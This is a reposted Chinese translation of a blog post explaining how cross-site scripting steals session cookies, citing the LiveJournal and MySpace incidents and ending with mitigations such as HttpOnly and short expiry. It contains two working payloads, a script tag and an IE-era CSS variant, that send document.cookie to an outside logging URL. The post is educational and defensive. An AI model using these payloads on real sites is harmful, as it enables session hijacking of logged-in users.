譯者按: 10年前的博客似乎有點(diǎn)老了，但是**XSS*****的威脅依然還在，我們不得不防。

創(chuàng)新互聯(lián)自2013年創(chuàng)立以來，是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司，擁有項(xiàng)目網(wǎng)站設(shè)計(jì)制作、網(wǎng)站建設(shè)網(wǎng)站策劃，項(xiàng)目實(shí)施與項(xiàng)目整合能力。我們以讓每一個(gè)夢(mèng)想脫穎而出為使命，1280元樂業(yè)做網(wǎng)站,已為上家服務(wù),為樂業(yè)各地企業(yè)和個(gè)人服務(wù),聯(lián)系電話:18980820575

• 原文: XSS - Stealing Cookies 101

• 譯者: Fundebug

為了保證可讀性，本文采用意譯而非直譯。另外，本文版權(quán)歸原作者所有，翻譯僅用于學(xué)習(xí)。

竊取Cookie是非常簡單的，因此不要輕易相信客戶端所聲明的身份。即便這個(gè)Cookie是在數(shù)秒之前驗(yàn)證過，那也未必是真的，尤其當(dāng)你僅使用Cookie驗(yàn)證客戶端的時(shí)候。

2006年1月，LiveJournal遭到了**XSS*****，這個(gè)事件足以警示我們。還有，2006年10月，MySapce也遭到了**XSS*****，這告訴我們必須非常謹(jǐn)慎地過濾用戶發(fā)布的文本，因?yàn)?可以在文本中摻雜一些JavaScript代碼，以此竊取登陸用戶的Cookie**。

正如****LiveJournal那樣，你不需要在登陸用戶的瀏覽器進(jìn)行任何操作，而可以在第三方進(jìn)行所有操作。更糟糕的是，竊取Cookie事實(shí)上操作起來非常簡單，但是防范起來卻非常困難**。

下面的的JavaScript代碼就可以竊取Cookie，是不是很簡單？

<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>

如果我可以將這段代碼插入到某個(gè)登陸用戶的頁面，則Cookie就會(huì)通過HTTP請(qǐng)求發(fā)送給我，然后我就可以偽造那個(gè)可憐的登陸用戶了！

在IE瀏覽器上，可以通過在CSS代碼中執(zhí)行JavaScript來竊取Cookie，也很簡單。

<style>
.getcookies{
    background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');
}
</style>
<p class="getcookies"></p>

如果你對(duì)用戶發(fā)布的文本內(nèi)容不進(jìn)行嚴(yán)格的過濾的話，*就可以很方便地竊取Cookie。是不是很可怕？如果你是一個(gè)負(fù)責(zé)任的開發(fā)者的話，你就應(yīng)該保持警惕！因此，你必須假設(shè)所有用戶的Cookie都被竊取了。注意，是所有用戶**，對(duì)于這一點(diǎn)，我不想含糊其辭。

為了保證安全：請(qǐng)不停地重設(shè)session的重設(shè)；將過期時(shí)間設(shè)置短一些；監(jiān)控referrer與userAgent的值；使用HttpOnly禁止腳本讀取Cookie。這些措施并非萬無一失，但是增加了***的難度，因此也是有效的。

如果你對(duì)MySapce遭到的**XSS*****不了解，可以查看*本人公開的技術(shù)細(xì)節(jié)，很有趣，不過切勿模仿，因?yàn)樗麨樽约旱男袨榇烁冻隽瞬恍〉拇鷥r(jià)：三年內(nèi)被禁止使用電腦！**。

參考鏈接

• 9.3 避免XSS***
• 薩米 (計(jì)算機(jī)蠕蟲)
• Technical explanation of The MySpace Worm
• Account Hijackings Force LiveJournal Changes

關(guān)于Fundebug

Fundebug專注于JavaScript、微信小程序、微信小游戲、支付寶小程序、React Native、Node.js和Java實(shí)時(shí)BUG監(jiān)控。 自從2016年雙十一正式上線，F(xiàn)undebug累計(jì)處理了7億+錯(cuò)誤事件，得到了Google、360、金山軟件、百姓網(wǎng)等眾多知名用戶的認(rèn)可。歡迎免費(fèi)試用！

版權(quán)聲明

轉(zhuǎn)載時(shí)請(qǐng)注明作者Fundebug以及本文地址：
https://blog.fundebug.com/2017/08/16/xss_steal_cookie/

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場景需求。

分享題目：XSS之竊取Cookie-創(chuàng)新互聯(lián)
標(biāo)題URL：http://www.ekvhdxd.cn/article36/cdcepg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供靜態(tài)網(wǎng)站、做網(wǎng)站、建站公司、網(wǎng)頁設(shè)計(jì)公司、ChatGPT、全網(wǎng)營銷推廣

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請(qǐng)聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)